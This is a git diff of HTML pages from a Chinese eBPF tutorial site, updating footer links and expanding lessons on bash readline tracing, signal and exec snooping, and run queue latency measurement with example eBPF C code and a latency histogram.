如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/404.html b/404.html index 7487a0b..2fff603 100644 --- a/404.html +++ b/404.html @@ -84,7 +84,7 @@ diff --git a/5-uprobe-bashreadline/index.html b/5-uprobe-bashreadline/index.html index c98c71a..d4aebc8 100644 --- a/5-uprobe-bashreadline/index.html +++ b/5-uprobe-bashreadline/index.html @@ -83,7 +83,7 @@ @@ -233,7 +233,7 @@ Runing eBPF program...

总结

在上述代码中,我们使用 SEC 宏定义了一个 uprobe 探针,指定了要挂载的用户空间程序 (/bin/bash) 和要捕获的函数 (readline)。此外,我们还使用 BPF_KRETPROBE 宏定义了一个处理 readline 函数返回值的回调函数 (printret)。该回调可以获取到 readline 的返回值,并将其打印到内核日志中。通过这种方式,我们就可以使用 eBPF 捕获 bash 的 readline 函数调用,从而获取用户在 bash 中输入的命令行。
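与这段描述对应的示意代码大致如下(缓冲区大小等常量仅为示例取值,细节以教程正文为准):

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

#define TASK_COMM_LEN 16
#define MAX_LINE_SIZE 80

/* uretprobe:在 /bin/bash 的 readline 函数返回时触发 */
SEC("uretprobe//bin/bash:readline")
int BPF_KRETPROBE(printret, const void *ret)
{
    char str[MAX_LINE_SIZE];
    char comm[TASK_COMM_LEN];
    u32 pid;

    if (!ret)
        return 0;

    bpf_get_current_comm(&comm, sizeof(comm));
    pid = bpf_get_current_pid_tgid() >> 32;
    /* readline 的返回值是用户态字符串指针,需要用 probe_read_user_str 拷贝 */
    bpf_probe_read_user_str(str, sizeof(str), ret);
    bpf_printk("PID %d (%s) read: %s", pid, comm, str);

    return 0;
}

char LICENSE[] SEC("license") = "GPL";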

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/6-sigsnoop/index.html b/6-sigsnoop/index.html index a0eb6f7..039c8fd 100644 --- a/6-sigsnoop/index.html +++ b/6-sigsnoop/index.html @@ -83,7 +83,7 @@ @@ -258,7 +258,7 @@ Runing eBPF program...

并使用一些对应的 API 进行访问,例如 bpf_map_lookup_elem、bpf_map_update_elem、bpf_map_delete_elem 等。
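作为示意,下面用一个简化的例子演示这几个 API 的典型用法:在系统调用入口处用 bpf_map_update_elem 记录事件,在出口处用 bpf_map_lookup_elem 取回并用 bpf_map_delete_elem 清理。注意这里的结构体字段和程序名是为说明而简化的,与教程中 sigsnoop 的实际实现并不完全相同:

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

struct sig_event {
    int pid;
    int sig;
};

struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 10240);
    __type(key, u32);
    __type(value, struct sig_event);
} values SEC(".maps");

SEC("tracepoint/syscalls/sys_enter_kill")
int sys_enter_kill(struct trace_event_raw_sys_enter *ctx)
{
    u32 tid = (u32)bpf_get_current_pid_tgid();
    struct sig_event ev = {};

    ev.pid = (int)ctx->args[0];
    ev.sig = (int)ctx->args[1];
    bpf_map_update_elem(&values, &tid, &ev, BPF_ANY);   /* 写入或更新 */
    return 0;
}

SEC("tracepoint/syscalls/sys_exit_kill")
int sys_exit_kill(struct trace_event_raw_sys_exit *ctx)
{
    u32 tid = (u32)bpf_get_current_pid_tgid();
    struct sig_event *evp = bpf_map_lookup_elem(&values, &tid);   /* 按 key 查找 */

    if (!evp)
        return 0;
    bpf_printk("kill: pid = %d, sig = %d, ret = %d\n", evp->pid, evp->sig, (int)ctx->ret);
    bpf_map_delete_elem(&values, &tid);                 /* 用完即删,避免残留 */
    return 0;
}

char LICENSE[] SEC("license") = "GPL";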

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/7-execsnoop/index.html b/7-execsnoop/index.html index deea97e..6231369 100644 --- a/7-execsnoop/index.html +++ b/7-execsnoop/index.html @@ -83,7 +83,7 @@ @@ -236,7 +236,7 @@ TIME PID PPID UID COMM

就可以往用户态直接发送信息。
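下面是一个简化的示意,展示如何定义 perf event array 并通过 bpf_perf_event_output 把事件发送到用户态(这里的 event 结构比 execsnoop 的真实结构简化了很多,仅用于说明流程):

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

struct exec_event {
    int pid;
    char comm[16];
};

struct {
    __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
    __uint(key_size, sizeof(u32));
    __uint(value_size, sizeof(u32));
} events SEC(".maps");

SEC("tracepoint/syscalls/sys_enter_execve")
int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter *ctx)
{
    struct exec_event event = {};

    event.pid = bpf_get_current_pid_tgid() >> 32;
    /* execve 尚未完成,这里取到的是调用者的进程名 */
    bpf_get_current_comm(&event.comm, sizeof(event.comm));
    /* 把事件直接写入 perf buffer,由用户态程序读取并打印 */
    bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event));
    return 0;
}

char LICENSE[] SEC("license") = "GPL";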

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/8-exitsnoop/index.html b/8-exitsnoop/index.html index 190f304..e4b0ea0 100644 --- a/8-exitsnoop/index.html +++ b/8-exitsnoop/index.html @@ -83,7 +83,7 @@ diff --git a/9-runqlat/index.html b/9-runqlat/index.html index fb045fb..1bd027f 100644 --- a/9-runqlat/index.html +++ b/9-runqlat/index.html @@ -83,7 +83,7 @@ @@ -148,6 +148,44 @@

eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。

runqlat 是一个 eBPF 工具,用于分析 Linux 系统的调度性能。具体来说,runqlat 用于测量一个任务在被调度到 CPU 上运行之前在运行队列中等待的时间。这些信息对于识别性能瓶颈和提高 Linux 内核调度算法的整体效率非常有用。

runqlat 原理

+

本教程是 eBPF 入门开发实践系列的第九部分,主题是 "捕获进程调度延迟"。在此,我们将介绍一个名为 runqlat 的程序,其作用是以直方图的形式记录进程调度延迟。

+

Linux 操作系统使用进程来执行所有的系统和用户任务。这些进程可能被阻塞、杀死、运行,或者正在等待运行。处在后两种状态的进程数量决定了 CPU 运行队列的长度。

+

进程有几种可能的状态,如:

+
    +
  • 可运行或正在运行
  • +
  • 可中断睡眠
  • +
  • 不可中断睡眠
  • +
  • 停止
  • +
  • 僵尸进程
  • +
+

等待资源或某些信号的进程会处于可中断或不可中断的睡眠状态:进程被置入睡眠,直到它需要的资源变得可用;之后,根据睡眠的类型,进程可以转移到可运行状态,或者继续保持睡眠。

+

即使进程拥有它需要的所有资源,它也不会立即开始运行,而是先转移到可运行状态,与其他处于相同状态的进程一起排队。CPU 会在接下来的若干毫秒或几秒内执行这些进程。调度器负责为 CPU 安排进程的执行顺序,并决定下一个要执行的进程。

+

根据系统的硬件配置,这个可运行队列(称为 CPU 运行队列)的长度可以短也可以长。短的运行队列长度表示 CPU 没有被充分利用。另一方面,如果运行队列长,那么可能意味着 CPU 不够强大,无法执行所有的进程,或者 CPU 的核心数量不足。在理想的 CPU 利用率下,运行队列的长度将等于系统中的核心数量。

+

进程调度延迟,也被称为 "run queue latency",衡量的是线程从变得可运行(例如,接收到中断,需要处理更多工作)到实际在 CPU 上运行之间的时间。在 CPU 饱和的情况下,可以想象线程必须排队等待轮到自己;但即使 CPU 没有饱和,在某些特殊场景下也可能出现较长的调度延迟,而且在一些情况下可以通过调优来减少这种延迟,从而提高整个系统的性能。

+

我们将通过一个示例来阐述如何使用 runqlat 工具。这是一个负载非常重的系统:

+
# runqlat
+Tracing run queue latency... Hit Ctrl-C to end.
+^C
+     usecs               : count     distribution
+         0 -> 1          : 233      |***********                             |
+         2 -> 3          : 742      |************************************    |
+         4 -> 7          : 203      |**********                              |
+         8 -> 15         : 173      |********                                |
+        16 -> 31         : 24       |*                                       |
+        32 -> 63         : 0        |                                        |
+        64 -> 127        : 30       |*                                       |
+       128 -> 255        : 6        |                                        |
+       256 -> 511        : 3        |                                        |
+       512 -> 1023       : 5        |                                        |
+      1024 -> 2047       : 27       |*                                       |
+      2048 -> 4095       : 30       |*                                       |
+      4096 -> 8191       : 20       |                                        |
+      8192 -> 16383      : 29       |*                                       |
+     16384 -> 32767      : 809      |****************************************|
+     32768 -> 65535      : 64       |***                                     |
+
+

在这个输出中,我们可以看到一个双峰分布:一个峰在 0 到 15 微秒之间,另一个峰在 16 到 65 毫秒之间。这些峰在 distribution 列(它只是对 "count" 列的可视化表示)中表现为尖峰。举例来说,读取其中一行:在追踪期间,有 809 个事件落在 16384 到 32767 微秒(即 16 到 32 毫秒)这个区间内。

+

在后续的教程中,我们将深入探讨如何利用 eBPF 对此类指标进行深度跟踪和分析,以更好地理解和优化系统性能。同时,我们也将学习更多关于 Linux 内核调度器、中断处理和 CPU 饱和等方面的知识。

runqlat 的实现利用了 eBPF 程序,它通过内核跟踪点和函数探针来测量进程在运行队列中的时间。当进程被排队时,trace_enqueue 函数会在一个映射中记录时间戳。当进程被调度到 CPU 上运行时,handle_switch 函数会检索时间戳,并计算当前时间与排队时间之间的时间差。这个差值(或 delta)被用于更新进程的直方图,该直方图记录运行队列延迟的分布。该直方图可用于分析 Linux 内核的调度性能。
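为帮助理解这一流程,下面给出一个极简的示意版本(省略了真实 runqlat 中按 pid/cgroup 过滤、按进程聚合直方图等细节,槽位计算在真实实现中由 bits.bpf.h 的 log2 辅助函数完成;完整实现见下文的 runqlat.bpf.c):

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

#define MAX_SLOTS 26

/* 记录每个 pid 的入队时间戳 */
struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 10240);
    __type(key, u32);
    __type(value, u64);
} start SEC(".maps");

/* slots[n] 统计延迟落在 [2^n, 2^(n+1)) 微秒内的次数 */
__u64 slots[MAX_SLOTS];

static __always_inline void trace_enqueue(u32 pid)
{
    u64 ts = bpf_ktime_get_ns();
    bpf_map_update_elem(&start, &pid, &ts, BPF_ANY);
}

static __always_inline void handle_switch(u32 next_pid)
{
    u64 *tsp = bpf_map_lookup_elem(&start, &next_pid);
    if (!tsp)
        return;

    u64 delta_us = (bpf_ktime_get_ns() - *tsp) / 1000;  /* 运行队列等待时间(微秒) */
    u32 slot = 0;
    while (slot < MAX_SLOTS - 1 && delta_us >= (1ULL << (slot + 1)))
        slot++;                                         /* 计算 log2 槽位 */
    __sync_fetch_and_add(&slots[slot], 1);
    bpf_map_delete_elem(&start, &next_pid);
}

SEC("tp_btf/sched_wakeup")
int BPF_PROG(sched_wakeup, struct task_struct *p)
{
    trace_enqueue(p->pid);
    return 0;
}

SEC("tp_btf/sched_switch")
int BPF_PROG(sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next)
{
    handle_switch(next->pid);
    return 0;
}

char LICENSE[] SEC("license") = "GPL";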

runqlat 代码实现

runqlat.bpf.c

@@ -305,7 +343,7 @@ int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct char LICENSE[] SEC("license") = "GPL"; -

首先,定义了一些常量和全局变量:

+

这其中定义了一些常量和全局变量,用于过滤对应的追踪目标:

#define MAX_ENTRIES 10240
 #define TASK_RUNNING  0
 
@@ -482,11 +520,17 @@ comm = cpptools
         64 -> 127        : 8        |*****************************           |
        128 -> 255        : 3        |**********                              |
 
+

完整源代码请见:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/9-runqlat

+

参考资料:

+

总结

runqlat 是一个 Linux 内核 BPF 程序,它以直方图的形式汇总调度器运行队列延迟,展示任务从可运行到真正在 CPU 上运行之前等待了多长时间。这个程序可以使用 ecc 工具编译,使用 ecli 命令运行。

runqlat 是一种用于监控 Linux 内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间长短,并据此优化进程调度、提高系统性能。其最初的源代码可以在 libbpf-tools 中找到:https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.bpf.c

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/bcc-documents/kernel-versions.html b/bcc-documents/kernel-versions.html index 6b739c1..4a19435 100644 --- a/bcc-documents/kernel-versions.html +++ b/bcc-documents/kernel-versions.html @@ -83,7 +83,7 @@ @@ -636,7 +636,7 @@ kernel can be retrieved with: